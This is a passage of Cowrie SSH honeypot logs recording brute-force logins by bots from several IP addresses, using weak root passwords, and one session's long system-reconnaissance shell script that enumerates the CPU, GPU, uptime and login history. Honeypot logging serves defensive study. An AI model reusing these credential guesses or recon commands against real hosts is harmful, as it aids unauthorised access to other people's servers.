],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T08:39:05.331217Z","src_ip":"185.93.89.7","session":"da3ba7a164ac"}
{"eventid":"cowrie.login.success","username":"root","password":"index1@","message":"login attempt [root/index1@] succeeded","sensor":"my-vps","timestamp":"2025-08-28T08:39:05.368892Z","src_ip":"185.93.89.7","session":"da3ba7a164ac"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:39:05.387951Z","src_ip":"185.93.89.7","session":"da3ba7a164ac"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":50998,"dst_ip":"1.2.3.4","dst_port":22,"session":"e5dd95083e21","protocol":"ssh","message":"New connection: 51.79.164.132:50998 (1.2.3.4:22) [session: e5dd95083e21]","sensor":"my-vps","timestamp":"2025-08-28T08:39:10.806351Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T08:39:10.858992Z","src_ip":"51.79.164.132","session":"e5dd95083e21"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T08:39:11.487487Z","src_ip":"51.79.164.132","session":"e5dd95083e21"}
{"eventid":"cowrie.login.failed","username":"test","password":"1234qwer","message":"login attempt [test/1234qwer] failed","sensor":"my-vps","timestamp":"2025-08-28T08:39:12.872892Z","src_ip":"51.79.164.132","session":"e5dd95083e21"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":43700,"dst_ip":"1.2.3.4","dst_port":22,"session":"8382f1414fb6","protocol":"ssh","message":"New connection: 185.93.89.7:43700 (1.2.3.4:22) [session: 8382f1414fb6]","sensor":"my-vps","timestamp":"2025-08-28T08:39:14.242388Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T08:39:14.243191Z","src_ip":"185.93.89.7","session":"8382f1414fb6"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T08:39:14.261339Z","src_ip":"185.93.89.7","session":"8382f1414fb6"}
{"eventid":"cowrie.login.success","username":"root","password":"Index1@","message":"login attempt [root/Index1@] succeeded","sensor":"my-vps","timestamp":"2025-08-28T08:39:14.301946Z","src_ip":"185.93.89.7","session":"8382f1414fb6"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:39:14.322357Z","src_ip":"185.93.89.7","session":"8382f1414fb6"}
{"eventid":"cowrie.session.closed","duration":"3.5","message":"Connection lost after 3.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:39:14.346078Z","src_ip":"51.79.164.132","session":"e5dd95083e21"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35552,"dst_ip":"1.2.3.4","dst_port":22,"session":"be296a72e5ae","protocol":"ssh","message":"New connection: 212.227.235.229:35552 (1.2.3.4:22) [session: be296a72e5ae]","sensor":"my-vps","timestamp":"2025-08-28T08:39:18.344515Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T08:39:18.777053Z","src_ip":"212.227.235.229","session":"be296a72e5ae"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T08:39:18.944818Z","src_ip":"212.227.235.229","session":"be296a72e5ae"}
{"eventid":"cowrie.login.success","username":"root","password":"admin123","message":"login attempt [root/admin123] succeeded","sensor":"my-vps","timestamp":"2025-08-28T08:39:22.291604Z","src_ip":"212.227.235.229","session":"be296a72e5ae"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T08:39:24.066061Z","src_ip":"212.227.235.229","session":"be296a72e5ae"}
{"eventid":"cowrie.command.input","input":"uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","message":"CMD: uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","sensor":"my-vps","timestamp":"2025-08-28T08:39:24.066837Z","src_ip":"212.227.235.229","session":"be296a72e5ae"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -m 2 > /dev/null","message":"CMD: uname -s -v -n -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-28T08:39:24.067454Z","src_ip":"212.227.235.229","session":"be296a72e5ae"}
{"eventid":"cowrie.command.input","input":"uname -m 2 > /dev/null","message":"CMD: uname -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-28T08:39:24.068537Z","src_ip":"212.227.235.229","session":"be296a72e5ae"}
{"eventid":"cowrie.command.input","input":"awk {u=int($1","message":"CMD: awk {u=int($1","sensor":"my-vps","timestamp":"2025-08-28T08:39:24.070084Z","src_ip":"212.227.235.229","session":"be296a72e5ae"}
{"eventid":"cowrie.command.input","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"CMD: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-28T08:39:24.070874Z","src_ip":"212.227.235.229","session":"be296a72e5ae"}
{"eventid":"cowrie.command.failed","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"Command not found: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-28T08:39:24.071698Z","src_ip":"212.227.235.229","session":"be296a72e5ae"}
{"eventid":"cowrie.command.input","input":"(secondsStr","message":"CMD: (secondsStr","sensor":"my-vps","timestamp":"2025-08-28T08:39:24.072958Z","src_ip":"212.227.235.229","session":"be296a72e5ae"}
{"eventid":"cowrie.command.input","input":"(seconds/86400","message":"CMD: (seconds/86400","sensor":"my-vps","timestamp":"2025-08-28T08:39:24.073578Z","src_ip":"212.227.235.229","session":"be296a72e5ae"}
{"eventid":"cowrie.command.input","input":"( (seconds%86400","message":"CMD: ( (seconds%86400","sensor":"my-vps","timestamp":"2025-08-28T08:39:24.074125Z","src_ip":"212.227.235.229","session":"be296a72e5ae"}
{"eventid":"cowrie.command.input","input":"(seconds%86400","message":"CMD: (seconds%86400","sensor":"my-vps","timestamp":"2025-08-28T08:39:24.074727Z","src_ip":"212.227.235.229","session":"be296a72e5ae"}
{"eventid":"cowrie.command.input","input":"( (seconds%3600","message":"CMD: ( (seconds%3600","sensor":"my-vps","timestamp":"2025-08-28T08:39:24.075384Z","src_ip":"212.227.235.229","session":"be296a72e5ae"}
{"eventid":"cowrie.command.input","input":"(seconds%3600","message":"CMD: (seconds%3600","sensor":"my-vps","timestamp":"2025-08-28T08:39:24.076031Z","src_ip":"212.227.235.229","session":"be296a72e5ae"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","shasum":"1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","destfile":"/dev/null","message":"Saved redir contents with SHA-256 1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057 to var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","sensor":"my-vps","timestamp":"2025-08-28T08:39:25.645194Z","src_ip":"212.227.235.229","session":"be296a72e5ae"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","size":74,"shasum":"ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","duplicate":true,"duration":"1.6","message":"Closing TTY Log: var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:39:25.646067Z","src_ip":"212.227.235.229","session":"be296a72e5ae"}
{"eventid":"cowrie.session.closed","duration":"7.3","message":"Connection lost after 7.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:39:25.647090Z","src_ip":"212.227.235.229","session":"be296a72e5ae"}
{"eventid":"cowrie.session.connect","src_ip":"107.189.19.100","src_port":63680,"dst_ip":"1.2.3.4","dst_port":22,"session":"c946aed679d6","protocol":"ssh","message":"New connection: 107.189.19.100:63680 (1.2.3.4:22) [session: c946aed679d6]","sensor":"my-vps","timestamp":"2025-08-28T08:39:25.895537Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T08:39:25.898916Z","src_ip":"107.189.19.100","session":"c946aed679d6"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T08:39:25.913435Z","src_ip":"107.189.19.100","session":"c946aed679d6"}
{"eventid":"cowrie.login.success","username":"root","password":"1qaz2QAZ","message":"login attempt [root/1qaz2QAZ] succeeded","sensor":"my-vps","timestamp":"2025-08-28T08:39:25.982895Z","src_ip":"107.189.19.100","session":"c946aed679d6"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:39:26.028833Z","src_ip":"107.189.19.100","session":"c946aed679d6"}
{"eventid":"cowrie.session.connect","src_ip":"107.189.19.100","src_port":60420,"dst_ip":"1.2.3.4","dst_port":22,"session":"58a70e4a7c66","protocol":"ssh","message":"New connection: 107.189.19.100:60420 (1.2.3.4:22) [session: 58a70e4a7c66]","sensor":"my-vps","timestamp":"2025-08-28T08:39:26.044986Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T08:39:26.045888Z","src_ip":"107.189.19.100","session":"58a70e4a7c66"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T08:39:26.069462Z","src_ip":"107.189.19.100","session":"58a70e4a7c66"}
{"eventid":"cowrie.login.success","username":"root","password":"1qaz2QAZ","message":"login attempt [root/1qaz2QAZ] succeeded","sensor":"my-vps","timestamp":"2025-08-28T08:39:28.644302Z","src_ip":"107.189.19.100","session":"58a70e4a7c66"}
{"eventid":"cowrie.session.closed","duration":"3.2","message":"Connection lost after 3.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:39:29.204451Z","src_ip":"107.189.19.100","session":"58a70e4a7c66"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":44492,"dst_ip":"1.2.3.4","dst_port":22,"session":"2aa361a0b0cd","protocol":"ssh","message":"New connection: 51.79.164.132:44492 (1.2.3.4:22) [session: 2aa361a0b0cd]","sensor":"my-vps","timestamp":"2025-08-28T08:39:37.122544Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T08:39:37.410523Z","src_ip":"51.79.164.132","session":"2aa361a0b0cd"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T08:39:37.411262Z","src_ip":"51.79.164.132","session":"2aa361a0b0cd"}
{"eventid":"cowrie.login.success","username":"root","password":"Aa123456","message":"login attempt [root/Aa123456] succeeded","sensor":"my-vps","timestamp":"2025-08-28T08:39:39.350728Z","src_ip":"51.79.164.132","session":"2aa361a0b0cd"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T08:39:40.505868Z","src_ip":"51.79.164.132","session":"2aa361a0b0cd"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T08:39:40.506737Z","src_ip":"51.79.164.132","session":"2aa361a0b0cd"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:39:40.841460Z","src_ip":"51.79.164.132","session":"2aa361a0b0cd"}
{"eventid":"cowrie.session.closed","duration":"3.7","message":"Connection lost after 3.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:39:40.842747Z","src_ip":"51.79.164.132","session":"2aa361a0b0cd"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":55494,"dst_ip":"1.2.3.4","dst_port":22,"session":"ba59f542334b","protocol":"ssh","message":"New connection: 185.93.89.7:55494 (1.2.3.4:22) [session: ba59f542334b]","sensor":"my-vps","timestamp":"2025-08-28T08:39:49.910443Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T08:39:49.924384Z","src_ip":"185.93.89.7","session":"ba59f542334b"}
